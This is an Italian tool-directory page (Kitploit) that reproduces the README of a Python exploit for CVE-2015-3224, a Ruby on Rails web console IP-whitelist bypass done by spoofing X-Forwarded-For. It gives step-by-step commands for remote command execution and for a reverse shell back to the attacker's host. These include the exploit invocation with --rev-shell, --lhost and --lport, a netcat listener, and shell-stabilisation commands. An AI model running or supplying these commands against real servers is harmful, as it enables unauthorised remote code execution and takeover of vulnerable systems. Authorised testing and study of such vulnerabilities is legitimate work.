Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2015-3224 — Exploit della Web Console di Ruby on Rails (CVE-2015-3224) | Kitploit
Strumenti/GitHubGitHub/sic4rio/cve-2015-3224
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Exploit della Web Console di Ruby on Rails (CVE-2015-3224)

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ruby on Rails Web Console Exploit (CVE-2015-3224)

CVE-2015-3224

Questo repository contiene uno script Python per sfruttare una vulnerabilità di bypass della whitelist IP nella console di sviluppo web di Ruby on Rails 4.0.x e 4.1.x. Lo script consente l'esecuzione remota di comandi su server vulnerabili.

⚠️ Disclaimer Questo script è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati. Non utilizzarlo su alcun sistema senza esplicita autorizzazione. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo script.


📌 Descrizione della Vulnerabilità

La console web nelle versioni vulnerabili di Ruby on Rails è pensata per scopi di sviluppo e dovrebbe essere accessibile solo da indirizzi IP fidati. Tuttavia, a causa di una gestione impropria dell'header HTTP X-Forwarded-For, un attaccante può falsificare il proprio indirizzo IP per apparire come un utente locale fidato (ad esempio 127.0.0.1 o ::1). Ciò aggira la whitelist IP e concede accesso non autorizzato alla console web, portando all'esecuzione remota di comandi.


🚀 Caratteristiche

  • Facile da usare: Interfaccia a riga di comando semplice.
  • Scoperta dinamica del percorso: Sonda automaticamente il target per trovare il percorso dinamico della sessione della console.
  • Due modalità di shell:
    • Shell semplice: Una shell di base non interattiva per comandi rapidi.
    • Reverse TTY Shell: Un comando singolo per ottenere una reverse shell PTY completamente interattiva.
  • Leggibilità migliorata: Output colorato per messaggi di stato, successi ed errori.
  • Robusto: Include gestione degli errori per problemi di rete e comandi falliti.

✅ Requisiti

  • Python 3
  • Libreria requests

Installa requests:

root@kitploit:~
pip install requests

⚙️ Utilizzo

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <nome-directory>
    
  2. Rendi eseguibile lo script:

    root@kitploit:~
    chmod +x exploit.py
    

Opzione 1: Shell Interattiva Semplice

Questa modalità è utile per eseguire comandi rapidi e semplici.

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

Opzione 2: TTY Interattiva Completa (Reverse Shell)

Questa è la modalità consigliata per una shell stabile e completamente interattiva.

Passo 1: Avvia un Listener

Sulla tua macchina locale, apri un nuovo terminale e avvia un listener netcat.

root@kitploit:~
nc -lvnp 9001

Passo 2: Esegui l'Exploit

In un altro terminale, esegui lo script con il flag --rev-shell, fornendo il tuo IP locale (lhost) e la porta (lport).

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <TUO_IP> --lport 9001

Passo 3: Stabilizza la Shell

Una connessione arriverà al tuo listener netcat. Per aggiornarla a una TTY completamente interattiva, segui questi passi nella finestra di netcat:

  1. Metti la shell in background premendo Ctrl+Z.
  2. Imposta il terminale locale in modalità raw e riporta la shell in primo piano.
    root@kitploit:~
    stty raw -echo; fg
    
    Premi Invio se il prompt non riappare.
  3. Imposta le proprietà del terminale sulla shell remota.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

Ora hai una shell stabile e completamente funzionale!


👥 Crediti

  • Exploit originale: Eval (@0xEval)
  • Il file Readme.md: GPT
Scarica lo strumento